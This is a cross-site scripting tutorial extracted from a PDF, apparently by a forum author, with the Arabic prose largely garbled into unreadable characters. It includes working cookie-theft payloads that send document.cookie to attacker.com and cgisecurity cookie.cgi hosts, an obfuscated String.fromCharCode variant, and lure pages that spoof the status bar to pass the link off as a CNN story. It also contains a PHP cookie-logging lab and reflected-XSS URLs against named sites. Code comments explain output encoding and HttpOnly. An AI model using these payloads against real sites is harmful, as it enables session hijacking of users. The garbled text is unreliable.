com/vb
AlQuRsAn Cross Site Scripting www. sfh.com/vb
CSS
2 )-_ 1 2 $ '/0( $0 > ^]XSS Z[ " \Cross Site Scripting
a W b c d '0OG /3 1 * e )- #@ 2 + . ` '6 @ I ( , +
<"U " 6j)* i WX iJ[ ( , + fWg h 3 ^=6 ` '6 @ !
.Z$?G WX k * lfWm T 3 B ! ... 6 @ 3O "
] 6jn c0 "\HEX f )* + e ` 'Q @ I E ;8> n c0 - ( $ o ,+ #@
. $ ( , + =< t u' v *" s I s" 1 / =lp qr+
!7)/ >O6 & e 2 ycl" s I01 2 $ '/0 /3 x8! I x 2 l ' )w
.@ I iJR W &[ 2 & uWX z< t s"
XSS CSS
Cascading ) L ' <| a I CSS WIX Cross Site Scripting {L Tt
q Y I . CSS WIX Z[ " { W Style Sheets
" ' 3 s~ . XSS WIX Cross Site Scripting z<nc -Y e N ,+ }
.XSS• 2 J uWX -
AlQuRsAn Cross Site Scripting www. sfh.com/vb
Cross Site TI =l<TP 0%l" XSS # JK2 > l" 4 $ ?" % € r<%l" Zr<
.• 6 Ic Scripting
XSS
" ActiveX " VBScript " Java Script @ ! ‚ O@< " $? I7 ) / n ! 4 ?" e
f ? ;Mv ! .=0 )w @ I W… ) / „... ƒ ,c Flash " HTML
„„„. I† ‡ˆ 6 3 ‰ " 8! I * 3 " =0@ <nJ0 " ( , +
‹Š )* + XSS o ,+ Z | , + # m 'Q @ !p
http://archives.neohapsis.com/archives/vuln- -
o 6Œ I† xDenial Of Servicex• 0 # m d$ [a )* + WX
.& $ + 3 " * ˆ ' ( , + r<)* - M•$
'XSS ! "#$%&
A + WX .PHPNuke X O Pc+ PHP A l e s I0XSS 2 JK #?
.A + WX ' c „.. I† ? %* e N V P + -Ž s I
‹A + W7 0)* + 2 ˆ '0OŒ } uWX
http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
!"##!$! %
http://www.cgisecurity.com/archive !! !"##! %
.# ? i$VA + WX /J O$0 • l)* + uWX ( $0
8 92 7 3 4 56
‘ O I†s ! r< @ I Vi O $0)* + X ƒ &V<)* + e f 2 $ '/0e # J @g<
)* + M , + 8! I B o lO $l ’ Zr<.... " < 8! I ( , )* + ;8> p
.E iJR r<)* + 1 ? • Q 8! I B W6ylO $l “O WX
;-%+< : 4 56
Ic Pt0MI 1 0 } ' ‚ 2 O- 3Œ } XO- 3 ! e B ” XSS 2 JK
R h56 J Ic & Pt 3 Script 6 @@ ! 4 6@< ^s y o
& t N & - ( $ I7 1 g I IP > • s I0h 3 •P 9
P> W 0 2 J U 6" J # v " Java Script VR<‚ ’ — ^ @ Ic XO P–
. L Y )* + ;8> URL nvy0 6 @( , +
e 2 ˆ '0OŒ uWX .)* - O' 6Œ - ( $0MI [ + 2 ˆ '0OG } > 0 3"
)* + WX z<( , - 8! I B 3 0h 3 ( , + P iJ[ 3p
www.cgisecurity.com/cgi-bin/cookie.cgi
.( , + f Y 8! I W… 4 6 ) / 0s~ %l<^ PV8! I B Pt h 3
Java Script ( , 3˜ 8! I *
4
‹( 4
" š l<HEX • ™ ;8m e 1 / ASCII • 4 p ;8m e 1 / Š 4 + e
.. [V" # v ' +e @ !p
‹ ASCII ( , 3<
http://host/a.php?variable="><script>document.location='http://www.cgise
> curity.com/cgi-bin/cookie.cgi?'' (document.cookie</script
&
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹ HEX ( , 3<
* + ,' ' ' '- '. '- './'- '-0' '
.0'.1'. '-$'. '.$'. '-0' '. '.1'. '. '-0'./'.1'.
' ' -'.2'-0'-0'- ' ' 1' 1'--'--'--' '. '.-'./'
- '.$'. '-$'- './'-0'-/' '. '.1'. ' 1'. '.-'./'
'. './'. ' 1'. '.1'.1'.+'./'.$' '. '.-'./' 1' -'
' +'.0'.1'. '-$'. '.$'. '-0' '. '.1'.1'.+'./'.$'
' 1'- '. '- './'- '-0'
? => 2 #
My cookie = user=zeno; id=
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
‹Š ! )* + z<1 / 3 h 3
GET /cgi-bin/cookie.cgi?user=zeno;' id=
)
AlQuRsAn Cross Site Scripting www. sfh.com/vb
XSS @ A&# 4 56
Pt0MI hexf @ I n c0 ˆ $ @ !p @ ! s~ ) 0‚ %l"
hex• c+ n6p @ I )R !y0E r Ec *% @ Ic N , -
.. " U " Œ 6 @( , -
• ,vp • I† I N • ,vp '* WX @ I h c ! T I†
.N@
= M v n¡ - %-* E l<( , + ¢?5 E r 8! I B * 3 T 4+e
Ic )* + 8! I B %* 3 - ( $ s ?p Tt e m I7 I
.s p u c WX ( , + '* ¢?5 n¡ ) 3
6
AlQuRsAn Cross Site Scripting www. sfh.com/vb
, B@C D 'E 4 56
e ˆ ? %l<z<% I z< 3 0— )- 2 + ^ # J '/ ( , > % / 3< r<
Websleuth u@" ( , 0) / 08! I E F%l<s~ cookie.cgi e X E *
.( , + f ? B /6 s I Œ s ! r<U
.. X 8! I * 3 I # + @g<E I•
http://www.idefense.com/XSS.html
>AF G )EH IJ
@ !p n c0 )R e A O " 'l
‹ z p # /Q
<!-- Lure page from the example: a single link whose tw= query parameter carries
     a script element that sends document.cookie to another host. The script
     only runs if the linked page writes tw back into its HTML without encoding
     it. HTML-encoding request parameters on output removes the injection point,
     and marking session cookies HttpOnly keeps them out of document.cookie. -->
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
. <a> T3 % d '0O˜! & e @I R X
8
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹ l # /Q
q Y ... U 6" & z<=P> ( $ 3 =lp F V cI s I0 $ # /Q
<!-- Same link as the previous example, with onMouseOver/onMouseOut handlers
     that write a cnn.com URL into window.status, so the status bar does not
     show the real href. The status-bar text is therefore not evidence of where
     a link leads. NOTE(review): current browsers generally ignore script writes
     to window.status; confirm for the browsers you support. -->
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
9
AlQuRsAn Cross Site Scripting www. sfh.com/vb
</html>
‹ MX @ I / 2 5 0 R"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/clinton.talkshow.reut/index.html';return
true"
onMouseOut="window.status='';return true"
. /+ & v '+ & T i $
‹ # /Q
...= " # X– 2 5 & !U & @ ! z< t ( , + I† Ic > 0 [ " X
<!-- Variant of the same link: the destination string is assembled one character
     at a time with String.fromCharCode, and the + operator is written as %2B,
     so the destination URL never appears as literal text in the query string.
     For a defender this is the reason input filters that look for known strings
     are not a sufficient control: the reflecting page has to encode the
     parameter when it writes it into HTML. The listing continues after the page
     header that follows. -->
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<script>var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
:
AlQuRsAn Cross Site Scripting www. sfh.com/vb
u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie;
document.location.replace(u);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
</html>
‹ R
h Y @ !" nJ+ WX e R u €<=6 nJ V <script> R tw nJ+
• l I+
http://attacker.com/hack.cgi?'+document.cookie;
.h ? h ?
http
x .2 $ h
x -0 $ t
x -0 $ t
x - $ p
x A $ ‹
x F $ £
e u -$ R E r
document.location.replace(u);
.@ I )' 0 @ ƒ ,c 1 `•
KDL 4 B@ M /+
.... )R @ ! " '$0` • 2 nJ- # V - ( X1 '
‹4
xss.php P- l@ ! " W nJ php J & - ( $l
http://localhost/xss.php
;
AlQuRsAn Cross Site Scripting www. sfh.com/vb
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
// xss.php: the deliberately vulnerable page of the local lab.
// $code is never assigned in this listing.
// NOTE(review): presumably it is filled from the request by register_globals
// (removed in PHP 5.4); confirm against the lab's PHP configuration.
// stripslashes() only removes backslashes; it does not HTML-encode. Whatever
// $code holds is written into the response as markup, which makes this echo
// the reflected-XSS sink.
// In real code, encode at the point of output instead, e.g.
//   echo htmlspecialchars($code, ENT_QUOTES, 'UTF-8');
if ( isset($code) )
echo stripslashes($code);
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
res.php P- l8! ! ¥c 0 &
http://localhost/res.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
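<?
// res.php: lab page that sets a test cookie ("myname" = "alqursan") so the
// demonstration has something to show in document.cookie.
// The third argument of setcookie() is the expiry as a Unix timestamp. The
// listing passed the quoted string "time()+(3600", which is never evaluated as
// an expression; the expression itself is passed here (one hour from now).
// The cookie is set without the HttpOnly flag, so page script can read it.
// Real session cookies should set HttpOnly (and Secure) so that an injected
// script cannot read them through document.cookie.
setcookie("myname", "alqursan", time() + 3600);
?>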
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
cookies.php P- l8! I B T 0 &
http://localhost/cookies.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
// cookies.php: the collecting end of the lab, i.e. the page that the injected
// script on this page sends the browser to with document.cookie appended.
// It is shown so the pattern can be recognised. Seen from the affected site,
// it looks like a navigation to a foreign host whose query string contains
// the site's own cookie string.
// Mitigations: HTML-encode request data on output in the reflecting page, and
// set HttpOnly on session cookies.
// NOTE(review): $HTTP_COOKIE is not assigned in this listing; presumably an old
// PHP/CGI setup exposes the request's Cookie header under that name (confirm).
$data=$HTTP_COOKIE;
// Open log.htm for appending.
$fp = fopen("log.htm","a");
// 2 is LOCK_EX: hold an exclusive lock for the duration of the write.
flock ($fp,2);
// The value is appended to an .htm file without encoding, so whoever opens the
// log in a browser renders request-supplied markup. Logged request data should
// be encoded or kept as plain text.
fputs ($fp,<BR>$data);
// 3 is LOCK_UN: release the lock before closing.
flock($fp,3);
fclose($fp);
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹2 /Q
‹Š Ž z< $ 2 & |5 - ¦§P> e Mc0 " Vn3 E sI sd c
C:\apache\htdocs
..php T W E * z<2 + uWX )VO "
8! ! )R ‹ z p # /Q
.. & V<
http://localhost/res.php
AlQuRsAn Cross Site Scripting www. sfh.com/vb
.. & —
http://localhost/xss.php
) + e Š @ I 6@"
<script>document.location='http://localhost/cookies.php?'+document.cook
ie</script>
‹ & @ < T3< Š 1 !< "
?word=<script>document.location='http://localhost/cookies.php?'+docume
nt.cookie</script >
9N/) = A:= E0 )
s I 3 Z' ¡ ›p E #@ > + @ !¨ # V - T* ( , ><uWX y 0G /
. XSS
I† .¦ R P- 3< ?" r<E - " r©0 * XSS 2 JK !W0. > < z<> < n¡
.s B Ic E * 6 ‰ 0 E • § ” E W L # J uWX c I7
&<0 z<] \Z[ " Š # VE 1 g XSS ! c+ ! > < # V
. 1 0 &< 2 &< $ z<ª & Z[ " &<0
AlQuRsAn Cross Site Scripting www. sfh.com/vb
O P% -) = A:= E0 )
)* + = iJ[ @ + d '0OG )' 0i$VE lM- s" Z > P3 @ ( , % ! r<
e i WX I T* asfh.com «5 )* z<i O=V2 > )* 2 O§ r<. M •
. Ic+ uWX ® ¬- a h 3 WX & e i iJ[ s @E &
.E <e V + B + " E <%& V%l" r<# v ' W 0h 3 XSS Zl ?"
.= $ ;Mv " e 05V ' G ƒ ,v " V 0G ƒ ,v 3O %- 3 %l" r<
U )R .E & 2 @ < Java Script ¡" /Q WX E l -Y U 6" $ ˆ
. 0;Mv " ( Ic WX .8! I B %* 3 ) • WX high E & e -Y
XSS !Q .R 0 )
. #n'I )* + e @ > ( , 3Œ P3 ›p § I7 N 3 # Pv %' !<XSS 2 JK
.. n ! )* ¦ X
FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft,
Zdnet, Wired, and Newsbytes
Pv ! #nPc 2 9 + e > 0. XSS 2 JK4 Iv" Iv )* + uWX !
)* ) 0x XO- 3 $ / ‘ v 7#Oc 3 clT XSS # JK°±¤¯- Z' $0
.x²O I
-U SSL SAT% D
)* + ^i$VT )* + 1 ˆ !y )* + } e s I *@ + 4 ! 0 WX ZG "
.4 ! 0 ³ WX ( , 0G )* + P ´ 80G SSL ( , 0
^ c+ 4 0G e s I+ H lW6y o ,+ ^ e -! ;Mc H l - 01 2 $ '/0
&
AlQuRsAn Cross Site Scripting www. sfh.com/vb
_4 NA, " ` *a IE 4 ^ bc _ 4( ^ !
http://www.microsoft.com/education/?ID=MCTN&target=http://www.mic
rosoft
com/education/?ID=MCTN&target="><script>alert(document.cookie)</sc
ript>
+ 3 2 3 % ! * ,5
ript>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</
>@1 ,0@ , @ ,AABA@ , @ , @C ,
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search
_text"><script>alert"document.cookie</script>
<script>[code]</script>
‹ Xn¡ " @ !p ?y = ' 3<T
document.write(document.cookies)
alert('alqursan');
document.location='http://site/cookie.php*4
' ( 3
.# J H l Jc0( 3 '3 ! Zˆ v H
6 @s I0¶ i Oe #@ > s I0 I•G 2 & @ !" 6 @W 0@ !p WX }
.i$V2 & @ !"
8
AlQuRsAn Cross Site Scripting www. sfh.com/vb
? H G )3 %) H S ) ) A% HEX ( %8 L d , ^
EFGH
I JKLHI EFGH
I JKLHI
'$ P ' MN
OPK
'$ Q ' !
'$ R ' "
'$ S ' #
'$0 T ' 0 $
'$$ U ' $ %
'$. V ' . &
'$- W ' 2 (
'$2 X ' / )
'$/ Y ' Q *
'$Q Z ' R +
'$R [ ' " ,
'$" S ' T -
'$T ] ' 7 .
'$7 ^ ' 1 /
'$U _ '
'. ` '
'. a '
'. b '
'. c ' 0 0
'.0 d ' $ $
'.$ e ' . .
'.. f ' - -
'.- g ' 2 2
'.2 h ' / /
'./ i ' Q :
'.Q j ' R ;
'.B k ' " <
'." l ' T =
'.T m ' 7 >
'.7 n ' U ?
'.1 o '0 @
9
AlQuRsAn Cross Site Scripting www. sfh.com/vb
'- p %0 A
'- q %0 B
'- r %0 C
'- s %00 D
'-0 t %0$ E
'-$ u %0. F
'-. v %0- G
'-- w %02 H
'-2 x %0/ I
'-/ y '0Q J
'-Q z '0R K
'-R { '0" L
'-" | '0T M
'-T } '07 N
'-7 ~ '0U O
:
AlQuRsAn Cross Site Scripting www. sfh.com/vb
9^
"The Cross Site Scripting FAQ", www.cgisecurity.com/articles/xss-faq.txt,
admin@cgisecurity.com
-h i
T Ÿ" #5 [V" =j -• l 3 · T " · WX
; ¹ l 0G N - + ) w + W… ) s" ¸ I · 4y3"
s $ 1 : T! 6"
‹ Š s z< 3O" t?5+ " O 3º
Alqursan_ @hotmail.com
1 0I – • o $Y ) w